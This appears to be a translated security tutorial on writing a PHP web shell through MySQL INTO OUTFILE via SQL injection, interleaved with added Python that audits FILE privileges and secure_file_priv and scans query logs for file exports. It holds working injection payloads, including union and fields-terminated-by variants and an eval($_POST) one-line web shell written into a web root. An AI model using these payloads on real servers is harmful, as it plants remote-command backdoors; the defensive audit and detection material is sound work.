The following conditions need to be met:
- root permissions on the MySQL account
- magic_quotes_gpc off (so single quotes can be used)
- the absolute path is known (not needed for reading a file, required for writing one)
- secure_file_priv is not configured
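From the defender's side, the same four conditions are the things to audit. The script below is an added example (not code from the original post): it interprets the value that SHOW VARIABLES LIKE 'secure_file_priv' returns and the lines that SHOW GRANTS returns, and reports how exposed an account is to file export. The grant strings and variable values in the test are constructed; the functions take text so they can be run against saved output without a live connection. Note that the page's "root permissions" condition is really the global FILE privilege, which root has via ALL PRIVILEGES; a restricted account without FILE cannot use INTO OUTFILE at all.

```python
"""Audit the MySQL write-file preconditions described above.

Added example for this page; it is not part of the original post.
Inputs are the text returned by SHOW VARIABLES LIKE 'secure_file_priv'
and SHOW GRANTS FOR <account>, so it works on captured output.
"""
import re
from typing import List, Optional


def secure_file_priv_state(value: Optional[str]) -> str:
    """Interpret secure_file_priv the way MySQL does:
    NULL -> import/export disabled entirely
    ''   -> unrestricted (the situation the page relies on)
    path -> export allowed only inside that directory
    """
    if value is None or value.strip().upper() == "NULL":
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"


def has_file_privilege(grants: List[str]) -> bool:
    """True if any grant line confers the global FILE privilege.

    FILE is a global privilege, so only grants ON *.* count; a grant
    ON `app`.* never carries it even if it says ALL PRIVILEGES.
    """
    for grant in grants:
        m = re.match(r"GRANT\s+(.+?)\s+ON\s+\*\.\*", grant.strip(), re.IGNORECASE)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if "ALL PRIVILEGES" in privs or "FILE" in privs:
            return True
    return False


def outfile_risk(secure_file_priv: Optional[str], grants: List[str]) -> str:
    """Combine the two checks into a single rating for the account."""
    if not has_file_privilege(grants):
        return "low: account lacks the FILE privilege"
    state = secure_file_priv_state(secure_file_priv)
    if state == "disabled":
        return "low: secure_file_priv is NULL, export is disabled"
    if state == "restricted":
        return "medium: export limited to the secure_file_priv directory"
    return "high: FILE privilege and secure_file_priv is empty"


if __name__ == "__main__":
    # Constructed sample output, not captured from a real server.
    root_grants = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
    web_grants = ["GRANT SELECT, INSERT, UPDATE ON `app`.* TO 'web'@'localhost'"]
    print(outfile_risk("", root_grants))
    print(outfile_risk("/var/lib/mysql-files/", root_grants))
    print(outfile_risk("", web_grants))
```

Since MySQL 5.7.6 the default for secure_file_priv is no longer empty, so an "unrestricted" result on a modern server means someone set it that way deliberately; pair this check with giving the web application its own account that has no FILE privilege.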
DROP TABLE IF EXISTS temp;   -- delete temp if it already exists
CREATE TABLE temp (cmd text NOT NULL);   -- create a temp table with a cmd field
INSERT INTO temp (cmd) VALUES ('<?php eval($_POST[cmd]);?>');   -- insert the one-line trojan into temp
SELECT cmd FROM temp INTO OUTFILE 'f:/wwwroot/eval.php';   -- select the one-liner from temp and write the result to eval.php
DROP TABLE IF EXISTS temp;   -- delete temp
union select 1,2,3,4,5,6,7,8,9,10,11,12
union select 1,2,'Zerosoul',4,5,6,7,8,9,10,11,12/*   -- Zerosoul is displayed where the page previously displayed 3.
That is, when a SELECT has no FROM clause, the numbers or strings it selects are returned directly as the query result.
1. Union write shell
id=2) union select 1,2,3,4,5,6,7,'<?php phpinfo();?>' into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php'
2. Without union
id=2) into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php' fields terminated by '<?php phpinfo();?>'
For example: SELECT * FROM users INTO OUTFILE 'C:\1.txt' FIELDS TERMINATED BY '<?php phpinfo();?>'
With this idea, the long block of SQL above can be simplified to a single statement:
SELECT '<?php eval($_POST[cmd]);?>' INTO OUTFILE 'f:/wwwroot/eval.php';
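Every variant on this page, the multi-statement version, the union version and the fields-terminated-by version, ends in INTO OUTFILE, which makes it a good detection anchor in the MySQL general query log or an audit plugin's output. The scanner below is an added example (not code from the original post) that reads general-log lines, rates any file export as medium and escalates to critical when the target path has a script extension or the query carries PHP/ASP tag markup, and also notes LOAD_FILE calls, which correspond to the read-file case the conditions list mentions. The log lines are constructed to mirror the page's own queries; the timestamp/thread-id/Query layout assumed is the MySQL general log file format.

```python
"""Flag file-export and file-read statements in MySQL general-log lines.

Added example for this page; it is not part of the original post.
Assumed input format is the general query log:  <time>\t<id> Query\t<sql>
"""
import re
from typing import List, Optional, Tuple

# Constructed sample log, modelled on the queries shown on the page.
SAMPLE_LOG = (
    "2024-05-01T10:00:00.000000Z\t    7 Query\tSELECT id,title FROM posts WHERE id=2\n"
    "2024-05-01T10:00:01.000000Z\t    7 Query\tSELECT id,title FROM posts WHERE id=2) "
    "union select 1,2,3,4,5,6,7,'<?php phpinfo();?>' into outfile "
    "'/home/wwwroot/lu4n.com/luan_phpinfo.php'\n"
    "2024-05-01T10:00:02.000000Z\t    7 Query\tSELECT id,title FROM posts WHERE id=2) "
    "into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php' "
    "fields terminated by '<?php phpinfo();?>'\n"
    "2024-05-01T10:00:03.000000Z\t    9 Query\tSELECT * FROM report INTO OUTFILE "
    "'/var/lib/mysql-files/report.csv' FIELDS TERMINATED BY ','\n"
    "2024-05-01T10:00:04.000000Z\t    9 Query\tSELECT LOAD_FILE('/etc/passwd')\n"
)

OUTFILE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+'([^']*)'", re.IGNORECASE)
LOAD_FILE_RE = re.compile(r"\bLOAD_FILE\s*\(", re.IGNORECASE)
TAG_RE = re.compile(r"<\?|<%")                  # PHP / ASP opening tags
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")


def classify(query: str) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a suspicious statement, else None."""
    m = OUTFILE_RE.search(query)
    if m:
        path = m.group(2)
        if path.lower().endswith(SCRIPT_EXT) or TAG_RE.search(query):
            return ("critical", f"file export to {path} with script content")
        return ("medium", f"file export to {path}")
    if LOAD_FILE_RE.search(query):
        return ("medium", "server-side file read via LOAD_FILE()")
    return None


def scan_log(text: str) -> List[Tuple[int, str, str]]:
    """Walk general-log lines; return (line_no, severity, reason) findings."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        parts = line.split("\t", 2)
        if len(parts) < 3 or not parts[1].strip().endswith("Query"):
            continue                                # not a query record
        verdict = classify(parts[2])
        if verdict:
            findings.append((line_no, verdict[0], verdict[1]))
    return findings


if __name__ == "__main__":
    for line_no, severity, reason in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {severity}: {reason}")
```

The general log records statements only when enabled, so on a production server the same rules are better fed from an audit plugin or a proxy; the classification logic is the same either way. Path-based escalation is deliberately broad: a legitimate export to the secure_file_priv directory stays at medium, while any write whose target ends in a script extension is worth an immediate look regardless of content.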
MySQL Write shell